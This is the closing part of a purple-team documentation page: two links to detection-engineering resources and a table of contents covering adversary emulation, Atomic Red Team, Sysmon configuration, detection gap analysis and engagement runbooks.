TonyPhipps/SIEM SIEM resources and detection references https://github.com/TonyPhipps/SIEM
awesome-detection-engineering Curated detection engineering resources https://github.com/infosecB/awesome-detection-engineering
PreviousMITRE ATT&CK
NextOSINT Tradecraft

On this page

  • Table of Contents
  • 1. Adversary Emulation Plan Structure
  • Source Framework: CTID Adversary Emulation Library
  • Emulation Plan Document Structure
  • Building a Custom Emulation Plan
  • 2. Atomic Red Team Test Execution
  • Test YAML Schema
  • Invoke-AtomicRedTeam Execution Commands
  • Linux Execution (via PowerShell Core)
  • 3. Detection Coverage Gap Analysis Methodology
  • Framework: Palantir Alerting and Detection Strategy (ADS)
  • Gap Analysis Process
  • Detection Coverage Scoring Matrix
  • D3FEND Integration for Gap Analysis
  • 4. Sysmon Configuration for Maximum Visibility
  • Configuration Approaches
  • Sysmon Event Types for Purple Team Coverage
  • sysmon-modular: Building a Custom Config
  • Recommended Purple Team Sysmon Config Strategy
  • Installation Commands
  • Critical Tuning Rules for Purple Team
  • 5. HELK & DetectionLab Setup
  • HELK (Hunting ELK)
  • DetectionLab
  • Splunk Attack Range (Recommended Active Alternative)
  • 6. ATT&CK Navigator Layer Creation
  • Layer JSON Structure (v4.x)
  • Programmatic Layer Generation (Python)
  • Layer Workflow for Purple Team
  • 7. Purple Team Engagement Runbook
  • Pre-Engagement Phase (1-2 Weeks Before)
  • Execution Phase
  • Post-Engagement Phase
  • Purple Team Cadence
  • Reference: Key Tool Links